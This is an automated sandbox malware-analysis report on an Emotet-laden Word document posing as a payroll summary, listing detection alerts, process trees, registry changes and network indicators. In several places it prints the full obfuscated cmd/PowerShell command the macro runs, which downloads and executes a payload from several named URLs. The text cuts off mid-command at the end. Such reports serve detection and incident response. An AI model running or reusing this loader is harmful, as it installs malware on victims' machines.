malicious
09172 Payroll Summary.doc
This report is generated from a file or URL submitted to this webservice on May 17th 2018 14:52:19 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by
Falcon Sandbox v8.10 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
- Uses network protocols on unusual ports
- Persistence
- Spawns a lot of processes
- Network Behavior
- Contacts 1 domain and 3 hosts. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 14
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ETPRO TROJAN W32/Emotet CnC Checkin" (SID: 2830701, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation" - source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
- details
- 3/67 reputation engines marked "http://ifcingenieria.cl" as malicious (4% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 10/57 Antivirus vendors marked sample as malicious (17% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Suricata Alert
-
General
-
The analysis extracted a file that was identified as malicious
- details
- 14/64 Antivirus vendors marked dropped file "57463.exe" as malicious (classified as "GenKryptik.BMLF" with 21% detection rate)
- source
- Binary File
- relevance
- 10/10
-
The analysis spawned a process that was identified as malicious
- details
-
14/64 Antivirus vendors marked spawned process "57463.exe" (PID: 3220) as malicious (classified as "GenKryptik.BMLF" with 21% detection rate)
14/64 Antivirus vendors marked spawned process "cmnmspthrd.exe" (PID: 2240) as malicious (classified as "GenKryptik.BMLF" with 21% detection rate) - source
- Monitored Target
- relevance
- 10/10
-
The analysis extracted a file that was identified as malicious
-
Installation/Persistance
-
Writes data to a remote process
- details
-
"cmd.exe" wrote 32 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"cmd.exe" wrote 52 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"cmd.exe" wrote 4 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"powershell.exe" wrote 32 bytes to a remote process "%PUBLIC%\57463.exe" (Handle: 1592)
"powershell.exe" wrote 52 bytes to a remote process "%PUBLIC%\57463.exe" (Handle: 1592)
"powershell.exe" wrote 4 bytes to a remote process "%PUBLIC%\57463.exe" (Handle: 1592)
"57463.exe" wrote 32 bytes to a remote process "%WINDIR%\System32\cmnmspthrd.exe" (Handle: 464)
"57463.exe" wrote 52 bytes to a remote process "%WINDIR%\System32\cmnmspthrd.exe" (Handle: 464)
"57463.exe" wrote 4 bytes to a remote process "%WINDIR%\System32\cmnmspthrd.exe" (Handle: 464) - source
- API Call
- relevance
- 6/10
-
Writes data to a remote process
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "138.0.120.12": ...
URL: http://ifcingenieria.cl/76j4qo/76524.exe (AV positives: 2/67 scanned on 05/17/2018 12:45:20)
URL: http://ifcingenieria.cl/76j4qo/ (AV positives: 3/67 scanned on 05/17/2018 11:57:55)
URL: http://vertek.cl/ (AV positives: 1/67 scanned on 04/27/2018 15:47:08)
URL: http://ifcingenieria.cl/ (AV positives: 3/67 scanned on 04/26/2018 10:45:03)
URL: http://ifcingenieria.cl/ni9tsuvgzii (AV positives: 3/67 scanned on 04/25/2018 18:44:00)
File SHA256: 3801181d5eec749898527ebc4279741acbc9f82c8aa72f8be272031d67eea76b (AV positives: 10/59 scanned on 04/25/2018 13:51:22)
File SHA256: 3f73123b71be81eb666247aaee7f7fb33ffc0160f29c586623067044b6521bb0 (AV positives: 10/70 scanned on 04/25/2018 11:56:13)
File SHA256: 77795c8a3c5a8ff8129cb4db828828c53a590f93583fcfb0b1112a4e670c97d4 (AV positives: 1/56 scanned on 05/19/2017 09:54:38)
File SHA256: a2cad944f3399bde2a5691c14be8b4f939898b5a97dadd579aff3390cdf3624f (AV positives: 1/56 scanned on 07/19/2016 09:29:10) - source
- Network Traffic
- relevance
- 10/10
-
Uses network protocols on unusual ports
- details
- TCP traffic to 81.21.67.85 on port 8080
- source
- Network Traffic
- relevance
- 7/10
-
Malicious artifacts seen in the context of a contacted host
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Spawns a lot of processes
- details
-
Spawned process "WINWORD.EXE" with commandline "/n "C:\09172 Payroll Summary.doc"" (Show Process)
Spawned process "cmd.exe" with commandline "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))" (Show Process), Spawned process "powershell.exe" with commandline "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" (Show Process), Spawned process "57463.exe" (Show Process), Spawned process "cmnmspthrd.exe" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 4 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 13
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download" (SID: 2016538, Rev: 3, Severity: 2) categorized as "Potentially Bad Traffic"
- source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
- 3/67 reputation engines marked "http://ifcingenieria.cl" as malicious (4% detection rate)
- source
- External System
- relevance
- 10/10
-
Detected Suricata Alert
-
General
-
Found a potential E-Mail address in binary/memory
- details
-
Pattern match: "lrqjor@acfarihso2squ.eozmftwzaojzglmgx275315aeb"
Pattern match: "570kmqatvuhjlu@qculdb.8z59uesf7p82066"
Pattern match: "sczcin3c7bopwqupp@51rtqrehb58ot.rddqrbi"
Pattern match: "pe9eldtfifdaex@lnwbyu9odpe9.uyy"
Pattern match: "tn@eilcbetw.ten.mu" - source
- File/Memory
- relevance
- 3/10
-
Found a potential E-Mail address in binary/memory
-
Installation/Persistance
-
Creates new processes
- details
-
"WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\cmd.exe", Handle: 1308)
"cmd.exe" is creating a new process (Name: "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe", Handle: 84)
"powershell.exe" is creating a new process (Name: "%PUBLIC%\57463.exe", Handle: 1592)
"57463.exe" is creating a new process (Name: "%WINDIR%\System32\cmnmspthrd.exe", Handle: 464) - source
- API Call
- relevance
- 8/10
-
Drops executable files
- details
- "57463.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
-
"WINWORD.EXE" opened "\Device\MountPointManager"
"powershell.exe" opened "\Device\MountPointManager"
"57463.exe" opened "\Device\MountPointManager" - source
- API Call
- relevance
- 5/10
-
Creates new processes
-
Network Related
-
Found potential IP address in binary/memory
- details
- "81.21.67.85"
- source
- File/Memory
- relevance
- 3/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source
- Network Traffic
- relevance
- 10/10
-
Found potential IP address in binary/memory
-
System Security
-
Modifies proxy settings
- details
-
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"cmnmspthrd.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"cmnmspthrd.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"cmnmspthrd.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE") - source
- Registry Access
- relevance
- 10/10
-
Modifies proxy settings
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
Found suspicious keyword "StrReverse" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)" - source
- Static Parser
- relevance
- 10/10
-
Executes powershell accessing native variables
- details
-
Process "powershell.exe" with commandline "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" (Indicator: "$pshome"
UID: 00010513-00002408) - source
- Monitored Target
- relevance
- 10/10
-
Extensive usage of escape characters in the commandline
- details
-
Process "cmd.exe" with commandline "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))" (UID: 00010503-00004016, Additional Context: "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= 